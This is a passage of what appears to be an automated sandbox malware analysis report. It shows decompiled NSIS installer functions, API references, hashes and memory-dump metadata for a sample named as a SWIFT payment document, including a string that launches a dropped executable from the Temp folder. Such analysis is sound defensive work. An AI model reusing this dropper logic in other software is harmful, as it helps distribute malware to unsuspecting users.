                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$A$C:\Users\user\AppData\Local\Temp$H7B
                                                                                  • API String ID: 2624150263-3672444555
                                                                                  • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                  • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                  • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                  • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 67%
                                                                                  			E004021AA() {
                                                                                  				signed int _t52;
                                                                                  				void* _t56;
                                                                                  				intOrPtr* _t60;
                                                                                  				intOrPtr _t61;
                                                                                  				intOrPtr* _t62;
                                                                                  				intOrPtr* _t64;
                                                                                  				intOrPtr* _t66;
                                                                                  				intOrPtr* _t68;
                                                                                  				intOrPtr* _t70;
                                                                                  				intOrPtr* _t72;
                                                                                  				intOrPtr* _t74;
                                                                                  				intOrPtr* _t76;
                                                                                  				intOrPtr* _t78;
                                                                                  				intOrPtr* _t80;
                                                                                  				void* _t83;
                                                                                  				intOrPtr* _t91;
                                                                                  				signed int _t101;
                                                                                  				signed int _t105;
                                                                                  				void* _t107;
                                                                                  
                                                                                  				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                  				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                  				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                  				_t52 =  *(_t107 - 0x20);
                                                                                  				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                  				_t101 = _t52 & 0x00008000;
                                                                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                  				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                  				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                  					E00402DA6(0x21);
                                                                                  				}
                                                                                  				_t56 = _t107 + 8;
                                                                                  				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                                                  				if(_t56 < _t83) {
                                                                                  					L14:
                                                                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                  					_push(0xfffffff0);
                                                                                  				} else {
                                                                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                                  					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                  					if(_t61 >= _t83) {
                                                                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                  						if(_t101 == _t83) {
                                                                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                                                  						}
                                                                                  						if(_t105 != _t83) {
                                                                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                  						}
                                                                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                  						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                  						if( *_t91 != _t83) {
                                                                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                  						}
                                                                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                  						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                  							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                  							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                  						}
                                                                                  						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                  					}
                                                                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                  					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                  						_push(0xfffffff4);
                                                                                  					} else {
                                                                                  						goto L14;
                                                                                  					}
                                                                                  				}
                                                                                  				E00401423();
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                                  				return 0;
                                                                                  			}






















                                                                                  0x004021b3
                                                                                  0x004021bd
                                                                                  0x004021c7
                                                                                  0x004021d1
                                                                                  0x004021dc
                                                                                  0x004021df
                                                                                  0x004021f9
                                                                                  0x004021fc
                                                                                  0x00402202
                                                                                  0x00402205
                                                                                  0x0040220f
                                                                                  0x00402213
                                                                                  0x00402213
                                                                                  0x00402218
                                                                                  0x00402229
                                                                                  0x00402231
                                                                                  0x004022e8
                                                                                  0x004022e8
                                                                                  0x004022ef
                                                                                  0x00402237
                                                                                  0x00402237
                                                                                  0x00402246
                                                                                  0x0040224a
                                                                                  0x0040224d
                                                                                  0x00402253
                                                                                  0x00402261
                                                                                  0x00402264
                                                                                  0x00402266
                                                                                  0x00402271
                                                                                  0x00402271
                                                                                  0x00402276
                                                                                  0x00402278
                                                                                  0x0040227f
                                                                                  0x0040227f
                                                                                  0x00402282
                                                                                  0x0040228b
                                                                                  0x0040228e
                                                                                  0x00402294
                                                                                  0x00402296
                                                                                  0x004022a0
                                                                                  0x004022a0
                                                                                  0x004022a3
                                                                                  0x004022ac
                                                                                  0x004022af
                                                                                  0x004022b8
                                                                                  0x004022be
                                                                                  0x004022c0
                                                                                  0x004022ce
                                                                                  0x004022ce
                                                                                  0x004022d1
                                                                                  0x004022d7
                                                                                  0x004022d7
                                                                                  0x004022da
                                                                                  0x004022e0
                                                                                  0x004022e6
                                                                                  0x004022fb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004022e6
                                                                                  0x004022f1
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                                                  • API String ID: 542301482-1104044542
                                                                                  • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                  • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                  • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                  • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 39%
                                                                                  			E0040290B(short __ebx, short* __edi) {
                                                                                  				void* _t21;
                                                                                  
                                                                                  				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                                  					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                  					_push(_t21 - 0x2b0);
                                                                                  					_push(__edi);
                                                                                  					E00406668();
                                                                                  				} else {
                                                                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                  					 *__edi = __ebx;
                                                                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                  				}
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                  				return 0;
                                                                                  			}




                                                                                  0x00402923
                                                                                  0x0040293e
                                                                                  0x00402949
                                                                                  0x0040294a
                                                                                  0x00402a94
                                                                                  0x00402925
                                                                                  0x00402928
                                                                                  0x0040292b
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                  • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                  • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                  • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 96%
                                                                                  			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct HWND__* _v12;
                                                                                  				long _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				signed char* _v32;
                                                                                  				int _v36;
                                                                                  				signed int _v44;
                                                                                  				int _v48;
                                                                                  				signed int* _v60;
                                                                                  				signed char* _v64;
                                                                                  				signed int _v68;
                                                                                  				long _v72;
                                                                                  				void* _v76;
                                                                                  				intOrPtr _v80;
                                                                                  				intOrPtr _v84;
                                                                                  				void* _v88;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				signed int _t198;
                                                                                  				intOrPtr _t201;
                                                                                  				long _t207;
                                                                                  				signed int _t211;
                                                                                  				signed int _t222;
                                                                                  				void* _t225;
                                                                                  				void* _t226;
                                                                                  				int _t232;
                                                                                  				long _t237;
                                                                                  				long _t238;
                                                                                  				signed int _t239;
                                                                                  				signed int _t245;
                                                                                  				signed int _t247;
                                                                                  				signed char _t248;
                                                                                  				signed char _t254;
                                                                                  				void* _t258;
                                                                                  				void* _t260;
                                                                                  				signed char* _t278;
                                                                                  				signed char _t279;
                                                                                  				long _t284;
                                                                                  				struct HWND__* _t291;
                                                                                  				signed int* _t292;
                                                                                  				int _t293;
                                                                                  				long _t294;
                                                                                  				signed int _t295;
                                                                                  				void* _t297;
                                                                                  				long _t298;
                                                                                  				int _t299;
                                                                                  				signed int _t300;
                                                                                  				signed int _t303;
                                                                                  				signed int _t311;
                                                                                  				signed char* _t319;
                                                                                  				int _t324;
                                                                                  				void* _t326;
                                                                                  
                                                                                  				_t291 = _a4;
                                                                                  				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                  				_v8 = GetDlgItem(_t291, 0x408);
                                                                                  				_t326 = SendMessageW;
                                                                                  				_v24 =  *0x42a288;
                                                                                  				_v28 =  *0x42a270 + 0x94;
                                                                                  				if(_a8 != 0x110) {
                                                                                  					L23:
                                                                                  					if(_a8 != 0x405) {
                                                                                  						_t301 = _a16;
                                                                                  					} else {
                                                                                  						_a12 = 0;
                                                                                  						_t301 = 1;
                                                                                  						_a8 = 0x40f;
                                                                                  						_a16 = 1;
                                                                                  					}
                                                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                  						_v16 = _t301;
                                                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                  							if(( *0x42a279 & 0x00000002) != 0) {
                                                                                  								L41:
                                                                                  								if(_v16 != 0) {
                                                                                  									_t237 = _v16;
                                                                                  									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                  										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                  									}
                                                                                  									_t238 = _v16;
                                                                                  									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                  										_t301 = _v24;
                                                                                  										_t239 =  *(_t238 + 0x5c);
                                                                                  										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                  										} else {
                                                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L48;
                                                                                  							}
                                                                                  							if(_a8 == 0x413) {
                                                                                  								L33:
                                                                                  								_t301 = 0 | _a8 != 0x00000413;
                                                                                  								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                                                  								_t295 = _t245;
                                                                                  								if(_t295 >= 0) {
                                                                                  									_t94 = _v24 + 8; // 0x8
                                                                                  									_t301 = _t245 * 0x818 + _t94;
                                                                                  									_t247 =  *_t301;
                                                                                  									if((_t247 & 0x00000010) == 0) {
                                                                                  										if((_t247 & 0x00000040) == 0) {
                                                                                  											_t248 = _t247 ^ 0x00000001;
                                                                                  										} else {
                                                                                  											_t254 = _t247 ^ 0x00000080;
                                                                                  											if(_t254 >= 0) {
                                                                                  												_t248 = _t254 & 0x000000fe;
                                                                                  											} else {
                                                                                  												_t248 = _t254 | 0x00000001;
                                                                                  											}
                                                                                  										}
                                                                                  										 *_t301 = _t248;
                                                                                  										E0040117D(_t295);
                                                                                  										_a12 = _t295 + 1;
                                                                                  										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                                                  										_a8 = 0x40f;
                                                                                  									}
                                                                                  								}
                                                                                  								goto L41;
                                                                                  							}
                                                                                  							_t301 = _a16;
                                                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                  								goto L41;
                                                                                  							}
                                                                                  							goto L33;
                                                                                  						} else {
                                                                                  							goto L48;
                                                                                  						}
                                                                                  					} else {
                                                                                  						L48:
                                                                                  						if(_a8 != 0x111) {
                                                                                  							L56:
                                                                                  							if(_a8 == 0x200) {
                                                                                  								SendMessageW(_v8, 0x200, 0, 0);
                                                                                  							}
                                                                                  							if(_a8 == 0x40b) {
                                                                                  								_t225 =  *0x42372c;
                                                                                  								if(_t225 != 0) {
                                                                                  									ImageList_Destroy(_t225);
                                                                                  								}
                                                                                  								_t226 =  *0x423740;
                                                                                  								if(_t226 != 0) {
                                                                                  									GlobalFree(_t226);
                                                                                  								}
                                                                                  								 *0x42372c = 0;
                                                                                  								 *0x423740 = 0;
                                                                                  								 *0x42a2c0 = 0;
                                                                                  							}
                                                                                  							if(_a8 != 0x40f) {
                                                                                  								L90:
                                                                                  								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                                                  									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                  									ShowWindow(_v8, _t324);
                                                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                  								}
                                                                                  								goto L93;
                                                                                  							} else {
                                                                                  								E004011EF(_t301, 0, 0);
                                                                                  								_t198 = _a12;
                                                                                  								if(_t198 != 0) {
                                                                                  									if(_t198 != 0xffffffff) {
                                                                                  										_t198 = _t198 - 1;
                                                                                  									}
                                                                                  									_push(_t198);
                                                                                  									_push(8);
                                                                                  									E00404FFF();
                                                                                  								}
                                                                                  								if(_a16 == 0) {
                                                                                  									L75:
                                                                                  									E004011EF(_t301, 0, 0);
                                                                                  									_v36 =  *0x423740;
                                                                                  									_t201 =  *0x42a288;
                                                                                  									_v64 = 0xf030;
                                                                                  									_v24 = 0;
                                                                                  									if( *0x42a28c <= 0) {
                                                                                  										L86:
                                                                                  										if( *0x42a31e == 0x400) {
                                                                                  											InvalidateRect(_v8, 0, 1);
                                                                                  										}
                                                                                  										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                                  											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                                                  										}
                                                                                  										goto L90;
                                                                                  									}
                                                                                  									_t292 = _t201 + 8;
                                                                                  									do {
                                                                                  										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                  										if(_t207 != 0) {
                                                                                  											_t303 =  *_t292;
                                                                                  											_v72 = _t207;
                                                                                  											_v76 = 8;
                                                                                  											if((_t303 & 0x00000001) != 0) {
                                                                                  												_v76 = 9;
                                                                                  												_v60 =  &(_t292[4]);
                                                                                  												_t292[0] = _t292[0] & 0x000000fe;
                                                                                  											}
                                                                                  											if((_t303 & 0x00000040) == 0) {
                                                                                  												_t211 = (_t303 & 0x00000001) + 1;
                                                                                  												if((_t303 & 0x00000010) != 0) {
                                                                                  													_t211 = _t211 + 3;
                                                                                  												}
                                                                                  											} else {
                                                                                  												_t211 = 3;
                                                                                  											}
                                                                                  											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                  											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                  											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                  										}
                                                                                  										_v24 = _v24 + 1;
                                                                                  										_t292 =  &(_t292[0x206]);
                                                                                  									} while (_v24 <  *0x42a28c);
                                                                                  									goto L86;
                                                                                  								} else {
                                                                                  									_t293 = E004012E2( *0x423740);
                                                                                  									E00401299(_t293);
                                                                                  									_t222 = 0;
                                                                                  									_t301 = 0;
                                                                                  									if(_t293 <= 0) {
                                                                                  										L74:
                                                                                  										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                  										_a16 = _t293;
                                                                                  										_a8 = 0x420;
                                                                                  										goto L75;
                                                                                  									} else {
                                                                                  										goto L71;
                                                                                  									}
                                                                                  									do {
                                                                                  										L71:
                                                                                  										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                  											_t301 = _t301 + 1;
                                                                                  										}
                                                                                  										_t222 = _t222 + 1;
                                                                                  									} while (_t222 < _t293);
                                                                                  									goto L74;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                  							goto L93;
                                                                                  						} else {
                                                                                  							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                  							if(_t232 == 0xffffffff) {
                                                                                  								goto L93;
                                                                                  							}
                                                                                  							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                  							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                  								_t294 = 0x20;
                                                                                  							}
                                                                                  							E00401299(_t294);
                                                                                  							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                  							_a12 = _a12 | 0xffffffff;
                                                                                  							_a16 = 0;
                                                                                  							_a8 = 0x40f;
                                                                                  							goto L56;
                                                                                  						}
                                                                                  					}
                                                                                  				} else {
                                                                                  					_v36 = 0;
                                                                                  					_v20 = 2;
                                                                                  					 *0x42a2c0 = _t291;
                                                                                  					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                                  					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                                  					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                                  					_t297 = _t258;
                                                                                  					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                                                  					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                  					 *0x42372c = _t260;
                                                                                  					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                  					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                  					}
                                                                                  					DeleteObject(_t297);
                                                                                  					_t298 = 0;
                                                                                  					do {
                                                                                  						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                  						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                  							if(_t298 != 0x20) {
                                                                                  								_v20 = 0;
                                                                                  							}
                                                                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                  						}
                                                                                  						_t298 = _t298 + 1;
                                                                                  					} while (_t298 < 0x21);
                                                                                  					_t299 = _a16;
                                                                                  					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                  					_push(0x15);
                                                                                  					E004045C4(_a4);
                                                                                  					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                  					_push(0x16);
                                                                                  					E004045C4(_a4);
                                                                                  					_t300 = 0;
                                                                                  					_v16 = 0;
                                                                                  					if( *0x42a28c <= 0) {
                                                                                  						L19:
                                                                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                  						goto L20;
                                                                                  					} else {
                                                                                  						_t319 = _v24 + 8;
                                                                                  						_v32 = _t319;
                                                                                  						do {
                                                                                  							_t278 =  &(_t319[0x10]);
                                                                                  							if( *_t278 != 0) {
                                                                                  								_v64 = _t278;
                                                                                  								_t279 =  *_t319;
                                                                                  								_v88 = _v16;
                                                                                  								_t311 = 0x20;
                                                                                  								_v84 = 0xffff0002;
                                                                                  								_v80 = 0xd;
                                                                                  								_v68 = _t311;
                                                                                  								_v44 = _t300;
                                                                                  								_v72 = _t279 & _t311;
                                                                                  								if((_t279 & 0x00000002) == 0) {
                                                                                  									if((_t279 & 0x00000004) == 0) {
                                                                                  										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                  									} else {
                                                                                  										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                  									}
                                                                                  								} else {
                                                                                  									_v80 = 0x4d;
                                                                                  									_v48 = 1;
                                                                                  									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                  									_v36 = 1;
                                                                                  									 *( *0x423740 + _t300 * 4) = _t284;
                                                                                  									_v16 =  *( *0x423740 + _t300 * 4);
                                                                                  								}
                                                                                  							}
                                                                                  							_t300 = _t300 + 1;
                                                                                  							_t319 =  &(_v32[0x818]);
                                                                                  							_v32 = _t319;
                                                                                  						} while (_t300 <  *0x42a28c);
                                                                                  						if(_v36 != 0) {
                                                                                  							L20:
                                                                                  							if(_v20 != 0) {
                                                                                  								E004045F9(_v8);
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								ShowWindow(_v12, 5);
                                                                                  								E004045F9(_v12);
                                                                                  								L93:
                                                                                  								return E0040462B(_a8, _a12, _a16);
                                                                                  							}
                                                                                  						}
                                                                                  						goto L19;
                                                                                  					}
                                                                                  				}
                                                                                  			}


























































                                                                                  0x00405038
                                                                                  0x00405051
                                                                                  0x00405056
                                                                                  0x0040505e
                                                                                  0x00405064
                                                                                  0x0040507a
                                                                                  0x0040507d
                                                                                  0x004052a8
                                                                                  0x004052af
                                                                                  0x004052c3
                                                                                  0x004052b1
                                                                                  0x004052b3
                                                                                  0x004052b6
                                                                                  0x004052b7
                                                                                  0x004052be
                                                                                  0x004052be
                                                                                  0x004052cf
                                                                                  0x004052dd
                                                                                  0x004052e0
                                                                                  0x004052f6
                                                                                  0x0040536b
                                                                                  0x0040536e
                                                                                  0x00405370
                                                                                  0x0040537a
                                                                                  0x00405388
                                                                                  0x00405388
                                                                                  0x0040538a
                                                                                  0x00405394
                                                                                  0x0040539a
                                                                                  0x0040539d
                                                                                  0x004053a0
                                                                                  0x004053bb
                                                                                  0x004053a2
                                                                                  0x004053ac
                                                                                  0x004053ac
                                                                                  0x004053a0
                                                                                  0x00405394
                                                                                  0x00000000
                                                                                  0x0040536e
                                                                                  0x004052fb
                                                                                  0x00405306
                                                                                  0x0040530b
                                                                                  0x00405312
                                                                                  0x00405317
                                                                                  0x0040531b
                                                                                  0x00405326
                                                                                  0x00405326
                                                                                  0x0040532a
                                                                                  0x0040532e
                                                                                  0x00405332
                                                                                  0x00405345
                                                                                  0x00405334
                                                                                  0x00405334
                                                                                  0x0040533b
                                                                                  0x00405341
                                                                                  0x0040533d
                                                                                  0x0040533d
                                                                                  0x0040533d
                                                                                  0x0040533b
                                                                                  0x00405349
                                                                                  0x0040534b
                                                                                  0x0040535e
                                                                                  0x00405361
                                                                                  0x00405364
                                                                                  0x00405364
                                                                                  0x0040532e
                                                                                  0x00000000
                                                                                  0x0040531b
                                                                                  0x004052fd
                                                                                  0x00405304
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004053be
                                                                                  0x004053be
                                                                                  0x004053c5
                                                                                  0x00405436
                                                                                  0x0040543e
                                                                                  0x00405446
                                                                                  0x00405446
                                                                                  0x0040544f
                                                                                  0x00405451
                                                                                  0x00405458
                                                                                  0x0040545b
                                                                                  0x0040545b
                                                                                  0x00405461
                                                                                  0x00405468
                                                                                  0x0040546b
                                                                                  0x0040546b
                                                                                  0x00405471
                                                                                  0x00405477
                                                                                  0x0040547d
                                                                                  0x0040547d
                                                                                  0x0040548a
                                                                                  0x004055eb
                                                                                  0x004055f2
                                                                                  0x0040560f
                                                                                  0x00405615
                                                                                  0x00405627
                                                                                  0x00405627
                                                                                  0x00000000
                                                                                  0x00405490
                                                                                  0x00405492
                                                                                  0x00405497
                                                                                  0x0040549c
                                                                                  0x004054a1
                                                                                  0x004054a3
                                                                                  0x004054a3
                                                                                  0x004054a4
                                                                                  0x004054a5
                                                                                  0x004054a7
                                                                                  0x004054a7
